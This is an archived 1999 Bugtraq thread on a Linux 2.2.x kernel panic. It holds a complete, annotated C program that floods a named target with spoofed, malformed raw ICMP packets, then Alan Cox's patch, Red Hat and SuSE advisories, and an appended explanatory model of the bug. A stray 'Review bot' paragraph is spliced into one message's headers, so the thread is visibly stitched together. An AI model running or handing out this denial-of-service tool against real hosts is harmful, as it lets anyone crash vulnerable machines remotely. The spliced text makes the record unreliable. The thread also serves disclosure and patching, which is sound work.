Date: Tue, 1 Jun 1999 17:43:17 +0200 
From: Piotr Wilkin <pwl@WOTAN.2SLO.WAW.PL>
To: BUGTRAQ@netspace.org
Subject: Linux kernel 2.2.x vulnerability/exploit

I'm sorry if this has been noticed before, but since I didn't find anything in the archives, I post it here.

There seems to be a bug in kernels 2.2.x (tested on 2.2.7 and 2.2.9) that causes them to panic when they are sent a large number of specific ICMP packets. I think the problem comes from the combination of the mangled header length (shorter or longer ihl's don't cause hangup) and the random ICMP packets (random type/subtype and source address) this program sends. Windows 9x and FreeBSD 3.0 seem to be unaffected.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--
Here is the program source (under Linux):
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <arpa/inet.h>
#include <errno.h>
#include <unistd.h>
#include <netdb.h>

/* IP header, ICMP header and payload, sent as one raw packet. The IP header
   claims ihl = 6 (a 24-byte header) but carries no options, so a receiver
   reads the first 4 bytes of the ICMP header as IP options. */
struct icmp_hdr {
    struct iphdr iph;
    struct icmp icp;
    char text[1002];
} icmph;

/* One's-complement checksum over nbytes, walked in 16-bit words. (The posted
   version stepped an int pointer while counting down by 2 and read past the
   buffer; the value does not matter for the crash, since the receiver parses
   the IP options before it ever checks the ICMP checksum.) */
unsigned short in_cksum(unsigned short *ptr, int nbytes)
{
    long sum = 0;
    unsigned short oddbyte, answer;

    while (nbytes > 1) {
        sum += *ptr++;
        nbytes -= 2;
    }
    if (nbytes == 1) {
        oddbyte = 0;
        *((unsigned char *)&oddbyte) = *(unsigned char *)ptr;
        sum += oddbyte;
    }
    sum = (sum >> 16) + (sum & 0xffff);
    sum += (sum >> 16);
    answer = ~sum;
    return answer;
}

/* Resolve the target and fill in a sockaddr_in for it. */
struct sockaddr_in sock_open(char *address, int prt)
{
    struct hostent *host;
    struct sockaddr_in sin;

    if ((host = gethostbyname(address)) == NULL) {
        perror("Unable to get host name");
        exit(-1);
    }
    memset(&sin, 0, sizeof(sin));
    sin.sin_family = AF_INET;
    sin.sin_port = htons(prt);
    memcpy(&sin.sin_addr, host->h_addr, host->h_length);
    return sin;
}

int main(int argc, char **argv)
{
    int sock, i, ctr;
    int on = 1;
    struct sockaddr_in addrs;

    if (argc < 3) {
        printf("Usage: %s <ip_addr> <port>\n", argv[0]);
        exit(-1);
    }
    for (i = 0; i < 1002; i++)
        icmph.text[i] = random() % 255;

    sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
    if (sock < 0) {
        perror("socket");
        exit(-1);
    }
    if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == -1)
        perror("Can't set IP_HDRINCL option on socket");

    addrs = sock_open(argv[1], atoi(argv[2]));

    /* Runs until interrupted; ctr wraps at 1000 and "b00m " marks every
       1000 packets sent. */
    for (ctr = 0; ; ctr = (ctr + 1) % 1000) {
        icmph.iph.version = 4;
        icmph.iph.ihl = 6;           /* claims 4 bytes of options that are not there */
        icmph.iph.tot_len = 1024;    /* Linux fills in the real length for IP_HDRINCL */
        icmph.iph.id = htons(0x001);
        icmph.iph.ttl = 255;
        icmph.iph.protocol = IPPROTO_ICMP;
        icmph.iph.saddr = ((random() % 255) * 255 * 255 * 255)
                        + ((random() % 255) * 65535)
                        + ((random() % 255) * 255)
                        + (random() % 255);    /* random spoofed source */
        icmph.iph.daddr = addrs.sin_addr.s_addr;
        icmph.iph.frag_off = htons(0);
        icmph.icp.icmp_type = random() % 14;   /* these two bytes land where the */
        icmph.icp.icmp_code = random() % 10;   /* receiver expects option type/length */
        icmph.icp.icmp_cksum = 0;
        icmph.icp.icmp_id = 2650;
        icmph.icp.icmp_seq = random() % 255;
        icmph.icp.icmp_cksum = in_cksum((unsigned short *)&icmph.icp, 1024);
        if (sendto(sock, &icmph, 1024, 0, (struct sockaddr *)&addrs,
                   sizeof(struct sockaddr)) == -1) {
            if (errno != ENOBUFS)
                printf("X");
        }
        if (ctr == 0)
            printf("b00m ");
        fflush(stdout);
    }
    close(sock);
    return 0;
}

---------------------------------------------------------------------------------
Date: Tue, 1 Jun 1999 23:30:33 +0100
From: Alan Cox <alan@LXORGUK.UKUU.ORG.UK>
To: BUGTRAQ@netspace.org
Subject: Linux 2.2 DoS attack

Ok, problem confirmed. It's not ICMP however; in fact the program given has some bugs that cause it. If it had been a correctly written ICMP tester it wouldn't have worked. A blessing in disguise.

Anyway the fix seems to be this. Sorry it took so long to sort out.

--- ../linux.vanilla/net/ipv4/ip_options.c	Wed May 12 16:49:38 1999
+++ net/ipv4/ip_options.c	Tue Jun 1 22:11:46 1999
@@ -452,7 +452,6 @@
 error:
 	if (skb) {
 		icmp_send(skb, ICMP_PARAMETERPROB, 0, htonl((pp_ptr-iph)<<24));
-		kfree_skb(skb);
 	}
 	return -EINVAL;
 }

Alan
---------------------------------------------------------------------------------
Date: Wed, 2 Jun 1999 08:59:07 +0200
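Review bot: dropping kfree_skb(skb) from the error: path of net/ipv4/ip_options.c means the function now returns -EINVAL with the skb still allocated, so the hunk is only correct if every caller that passes a non-NULL skb frees it on that return; the panic reported in this thread is consistent with the callers already doing so (the removed line was a second free), but nothing in the hunk shows that, so add a one-line comment at the error: label ("skb still belongs to the caller, do not free it here") so the free is not reintroduced later, and check each caller's -EINVAL handling when applying.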
From: Piotr Wilkin <pwl@WOTAN.2SLO.WAW.PL>
To: BUGTRAQ@netspace.org
Subject: Re: Linux kernel 2.2.x vulnerability/exploit

I forgot to add two things:

1) This code is very machine-specific. I tried it on our NFS-mounted Debian in school, but I don't know what the hardware "requirements" are for it to work.

2) It was compiled by g++: g++ exploit.cpp -o exploit

P.S. Sorry, I don't KNOW how to patch it (I hope the guys at kernel.org know).
---------------------------------------------------------------------------------
Date: Wed, 2 Jun 1999 16:56:41 -0400
From: Matt Wilson <msw@REDHAT.COM>
To: BUGTRAQ@netspace.org
Subject: [SECURITY] New kernel packages available

New packages that correct a vulnerability in the kernels that shipped with Red Hat Linux 6.0 are now available. When exploited, this vulnerability allows remote users to crash machines running 2.2.x kernels.

Thanks to Piotr Wilkin for reporting the problem and to Alan Cox for the fix.

Red Hat Software recommends that all users with networked machines upgrade to this release.

The procedure for upgrading the kernel is documented at

  http://www.redhat.com/corp/support/docs/kernel-upgrade/kernel-upgrade.html

Please read the entire section for your architecture before upgrading.

Red Hat Linux 6.0
=================

Intel
-----
rpm -ivh ftp://updates.redhat.com/6.0/i386/kernel-2.2.5-22.i386.rpm
rpm -ivh ftp://updates.redhat.com/6.0/i386/kernel-2.2.5-22.i586.rpm
rpm -ivh ftp://updates.redhat.com/6.0/i386/kernel-smp-2.2.5-22.i586.rpm
rpm -ivh ftp://updates.redhat.com/6.0/i386/kernel-2.2.5-22.i686.rpm
rpm -ivh ftp://updates.redhat.com/6.0/i386/kernel-smp-2.2.5-22.i686.rpm

Alpha
-----
rpm -ivh ftp://updates.redhat.com/6.0/alpha/kernel-2.2.5-22.alpha.rpm
rpm -ivh ftp://updates.redhat.com/6.0/alpha/kernel-smp-2.2.5-22.alpha.rpm

SPARC/UltraSPARC
----------------
Note: These packages obsolete the earlier kernel-2.2.5-21 release for SPARC. The problems fixed by the 2.2.5-21 release are also fixed in 2.2.5-22.
rpm -ivh ftp://updates.redhat.com/6.0/sparc/kernel-2.2.5-22.sparc.rpm
rpm -ivh ftp://updates.redhat.com/6.0/sparc/kernel-smp-2.2.5-22.sparc.rpm
rpm -ivh ftp://updates.redhat.com/6.0/sparc/kernel-2.2.5-22.sparc64.rpm
rpm -ivh ftp://updates.redhat.com/6.0/sparc/kernel-smp-2.2.5-22.sparc64.rpm

Source RPM
----------
rpm -Uvh ftp://updates.redhat.com/6.0/SRPMS/kernel-2.2.5-22.src.rpm

===================================================================
Matt Wilson
PGP public key: http://charlotte.redhat.com/~msw/pgp_public_key.asc
---------------------------------------------------------------------------------
SuSE Security Announcement Jun 4th, 01:49:58

-----BEGIN PGP SIGNED MESSAGE-----

______________________________________________________________________________

SuSE Security Announcement

Package:  Linux kernel 2.2.x
Date:     Thu Jun 3 19:50:05 CEST 1999
Affected: All Linux systems using kernel 2.2.x
______________________________________________________________________________

A security hole was discovered in the package mentioned above. Please update as soon as possible or disable the service if you are using this software on your SuSE Linux installation(s).

Other Linux distributions or operating systems might be affected as well; please contact your vendor for information about this issue.

Please note that we provide this information on an "as-is" basis only. There is no warranty whatsoever and no liability for any direct, indirect or incidental damage arising from this information or the installation of the update package.
______________________________________________________________________________

1. Problem Description

The Linux kernel 2.2.x doesn't correctly parse the IP options, which leads to a kernel panic.

2. Impact

Linux machines running kernel 2.2.x could be shut down over the network by sending maliciously formatted ICMP packets.

3. Solution

Install the fixed kernel from our ftp server.
______________________________________________________________________________

Here are the md5 checksums of the upgrade packages; please verify these before installing the new package:

d7da41803cde484fac910dc0eaa0a5df  lx_suse-2.2.7.SuSE-3.i386.rpm
c106a0465630260cfa4181c2c0e84ec4  linux-2.2.7.SuSE.tgz
______________________________________________________________________________

You will find the updates on our ftp server:

ftp://ftp.suse.com/pub/SuSE-Linux/suse_update/kernel/linux-2.2.7.SuSE.tgz
ftp://ftp.suse.com/pub/SuSE-Linux/suse_update/suse61/d1/lx_suse-2.2.7.SuSE-3.i386.rpm

Webpage for patches:

http://www.suse.de/patches/index.html

or try the following web pages for a list of mirrors:

http://www.suse.de/ftp.html
http://www.suse.com/ftp_new.html
______________________________________________________________________________

SuSE has two free security mailing list services to which any interested party may subscribe:

suse-security@suse.com
  - unmoderated and for general/linux/SuSE security discussions. All SuSE security announcements are sent to this list.

suse-security-announce@suse.com
  - SuSE's announce-only mailing list. Only SuSE's security announcements are sent to this list.

To subscribe, send an email to majordomo@suse.com with the text

  subscribe suse-security
or
  subscribe suse-security-announce

in the body of the message. Or just issue

  echo subscribe suse-security | mail majordomo@suse.com
or
  echo subscribe suse-security-announce | mail majordomo@suse.com
______________________________________________________________________________

If you want to report *NEW* security bugs in the SuSE Linux Distribution, please send an email to security@suse.de or call our support line. You may use pgp with the public key below to ensure confidentiality.
______________________________________________________________________________

This information is provided freely to everyone interested and may be redistributed provided that it is not altered in any way.
Type Bits/KeyID    Date       User ID
pub  2048/3D25D3D9 1999/03/06 SuSE Security Team

- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3i

mQENAzbhLQQAAAEIAKAkXHe0lWRBXLpn38hMHy03F0I4Sszmoc8aaKJrhfhyMlOA
BqvklPLE2f9UrI4Xc860gH79ZREwAgPt0pi6+SleNFLNcNFAuuHMLQOOsaMFatbz
JR9i4m/lf6q929YROu5zB48rBAlcfTm+IBbijaEdnqpwGib45wE/Cfy6FAttBHQh
1Kp+r/jPbf1mYAvljUfHKuvbg8t2EIQz/5yGp+n5trn9pElfQO2cRBq8LFpf1l+U
P7EKjFmlOq+Gs/fF98/dP3DfniSd78LQPq5vp8RL8nr/o2i7jkAQ33m4f1wOBWd+
cZovrKXYlXiR+Bf7m2hpZo+/sAzhd7LmAD0l09kABRG0JVN1U0UgU2VjdXJpdHkg
VGVhbSA8c2VjdXJpdHlAc3VzZS5kZT6JARUDBRA24S1H5Fiyh7HKPEUBAVcOB/9b
yHYji1/+4Xc2GhvXK0FSJN0MGgeXgW47yxDL7gmR4mNgjlIOUHZj0PEpVjWepOJ7
tQS3L9oP6cpj1Fj/XxuLbkp5VCQ61hpt54coQAvYrnT9rtWEGN+xmwejT1WmYmDJ
xG+EGBXKr+XP69oIUl1E2JO3rXeklulgjqRKos4cdXKgyjWZ7CP9V9daRXDtje63
Om8gwSdU/nCvhdRIWp/Vwbf7Ia8iZr9OJ5YuQl0DBG4qmGDDrvImgPAFkYFzwlqo
choXFQ9y0YVCV41DnR+GYhwl2qBd81T8aXhihEGPIgaw3g8gd8B5o6mPVgl+nJqI
BkEYGBusiag2pS6qwznZiQEVAwUQNuEtBHey5gA9JdPZAQFtOAf+KVh939b0J94u
v/kpg4xs1LthlhquhbHcKNoVTNspugiC3qMPyvSX4XcBr2PC0cVkS4Z9PY9iCfT+
x9WM96g39dAF+le2CCx7XISk9XXJ4ApEy5g4AuK7NYgAJd39PPbERgWnxjxir9g0
Ix30dS30bW39D+3NPU5Ho9TD/B7UDFvYT5AWHl3MGwo3a1RhTs6sfgL7yQ3U+mvq
MkTExZb5mfN1FeaYKMopoI4VpzNVeGxQWIz67VjJHVyUlF20ekOz4kWVgsxkc8G2
saqZd6yv2EwqYTi8BDAduweP33KrQc4KDDommQNDOXxaKOeCoESIdM4p7Esdjq1o
L0oixF12Cg==
=pIeS
- -----END PGP PUBLIC KEY BLOCK-----

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQEVAwUBN1dUQney5gA9JdPZAQHnWQf9EMvrfAlTBiq6kVl1ZYrHZJEI1F+CQY68
baAOl6Du5YBbW4oIlTdY8W1an4m/BRMGfR3lTV/7N+o0Bd7kvmwg6n8e4HQmRJL/
XWUQRATkMV3QCe24ACzvpATELf8KakDaxjpbSWPGwoslmeTg+1G1z1vH7423YOGG
OymxfiPOselUZoU/x2nexRHi/TjlcAu4eAWJ59/PC4i0OMT3V1Hqb3eYfIHlikQz
xMh/T3HeY8MNS+8JT0MlHVc+b8KdaZ5wA+f3KG4ot9yAeoqKjxK43I3JjkEAhvxg
QrR99Fh5YBMUrieQ1Kkvpp1T3JdQi1Cf0NpgYx9kSZDO3fAD60lZww==
=uBdV
-----END PGP SIGNATURE-----
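Added example, not part of the Bugtraq thread above and not kernel code: a userland model of the IP option walk that Piotr Wilkin's packets trip and that Alan Cox's ip_options.c hunk fixes. It shows why a header that claims ihl=6 but carries no options lands in the error path (the ICMP type and code bytes that follow the 20-byte header are read as option type and length), how many of the exploit's random type/code combinations do so, and why the option walker must leave the buffer to its caller so that an erroring packet is freed exactly once. The option constants, the 64-byte packet buffers, the `pkt` struct with its free counter, the fixed checksum bytes 0x12 0x34 and the function names are this example's own constructions; `walk_ip_options` mirrors the length checks a receiver makes (END, NOOP, a length-checked RR, everything else skipped by length) but is a simplification, not the kernel's code.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define IPOPT_END     0
#define IPOPT_NOOP    1
#define IPOPT_RR      7
#define OPT_OK        0
#define OPT_PARAMPROB (-1)

/* Walk the options of an IPv4 header as a receiver would. On a malformed
 * option *pp gets the offset of the offending byte from the start of the
 * header (the value a Parameter Problem reports) and OPT_PARAMPROB is returned. */
int walk_ip_options(const uint8_t *iph, size_t pktlen, unsigned *pp)
{
    unsigned ihl = (iph[0] & 0x0f) * 4u;
    const uint8_t *optptr = iph + 20;
    int l = (int)ihl - 20;

    if (ihl < 20 || ihl > pktlen) { *pp = 0; return OPT_PARAMPROB; }
    while (l > 0) {
        int optlen;
        if (optptr[0] == IPOPT_END) break;
        if (optptr[0] == IPOPT_NOOP) { optptr++; l--; continue; }
        optlen = (l >= 2) ? optptr[1] : 0;              /* no room for a length byte */
        if (optlen < 2 || optlen > l) { *pp = (unsigned)(optptr - iph); return OPT_PARAMPROB; }
        if (optptr[0] == IPOPT_RR) {                    /* record route: length, then pointer */
            if (optlen < 3)    { *pp = (unsigned)(optptr + 1 - iph); return OPT_PARAMPROB; }
            if (optptr[2] < 4) { *pp = (unsigned)(optptr + 2 - iph); return OPT_PARAMPROB; }
        }
        optptr += optlen;                               /* other types: skip by length */
        l -= optlen;
    }
    return OPT_OK;
}

struct pkt { uint8_t *data; size_t len; int frees; };  /* stand-in for an skb (constructed) */

static void pkt_free(struct pkt *p) { free(p->data); p->data = NULL; p->frees++; }

/* Header carrying the given option bytes (n a multiple of 4, at most 40). */
struct pkt make_pkt(const uint8_t *opts, size_t n)
{
    struct pkt p = { calloc(1, 64), 64, 0 };
    if (!p.data) abort();
    p.data[0] = (uint8_t)(0x40 | (5 + n / 4));          /* version 4, ihl in words */
    p.data[9] = 1;                                      /* IPPROTO_ICMP */
    if (n) memcpy(p.data + 20, opts, n);
    return p;
}

/* The exploit's shape: a plain 20-byte header that claims `ihl` words, followed
 * directly by an ICMP header (type, code, two constructed checksum bytes). */
struct pkt make_exploit_pkt(unsigned ihl, uint8_t icmp_type, uint8_t icmp_code)
{
    struct pkt p = make_pkt(NULL, 0);
    p.data[0] = (uint8_t)(0x40 | (ihl & 0x0f));
    p.data[20] = icmp_type; p.data[21] = icmp_code;
    p.data[22] = 0x12;      p.data[23] = 0x34;
    return p;
}

/* Patched receive path: the caller owns the buffer and drops it exactly once,
 * whatever the option walk returned. */
int receive(struct pkt *p, unsigned *pp)
{
    int rc = walk_ip_options(p->data, p->len, pp);
    pkt_free(p);
    return rc;
}

/* Pre-patch behaviour: the walker also freed on error, so a bad packet was
 * freed twice. pkt_free() NULLs the pointer, so here the second free only counts. */
int receive_prepatch(struct pkt *p, unsigned *pp)
{
    int rc = walk_ip_options(p->data, p->len, pp);
    if (rc != OPT_OK) pkt_free(p);                      /* the kfree_skb() the patch removes */
    pkt_free(p);
    return rc;
}

/* How much of the exploit's type/code space (random() % 14, random() % 10)
 * lands in the error path for a claimed ihl; *total receives the count tried. */
int exploit_error_count(unsigned ihl, int *total)
{
    int errs = 0;
    unsigned pp;
    *total = 0;
    for (int t = 0; t < 14; t++)
        for (int c = 0; c < 10; c++) {
            struct pkt p = make_exploit_pkt(ihl, (uint8_t)t, (uint8_t)c);
            if (receive(&p, &pp) == OPT_PARAMPROB) errs++;
            (*total)++;
        }
    return errs;
}

int main(void)
{
    unsigned pp;
    int total, rc;
    struct pkt p = make_exploit_pkt(6, 3, 0);           /* ihl=6 over ICMP type 3, code 0 */
    rc = receive(&p, &pp);
    printf("ihl=6 over ICMP 3/0: rc=%d pointer=%u freed %d time(s)\n", rc, pp, p.frees);
    p = make_exploit_pkt(6, 3, 0);
    rc = receive_prepatch(&p, &pp);
    printf("same packet, pre-patch: rc=%d freed %d time(s)\n", rc, p.frees);
    for (unsigned ihl = 5; ihl <= 6; ihl++) {
        int errs = exploit_error_count(ihl, &total);
        printf("ihl=%u: %d of %d type/code combinations hit the error path\n", ihl, errs, total);
    }
    return 0;
}
```

Build with `cc -std=c99 -o ipopts ipopts.c`. With ihl=5 nothing is parsed as an option and every packet passes; with ihl=6 most of the exploit's type/code space fails the length check (type 0 is END, type 1 is NOOP, and only a length byte of 2..4 fits the 4 bytes the header claims), which is why a burst of random packets, rather than a single crafted one, was enough to hit the double free.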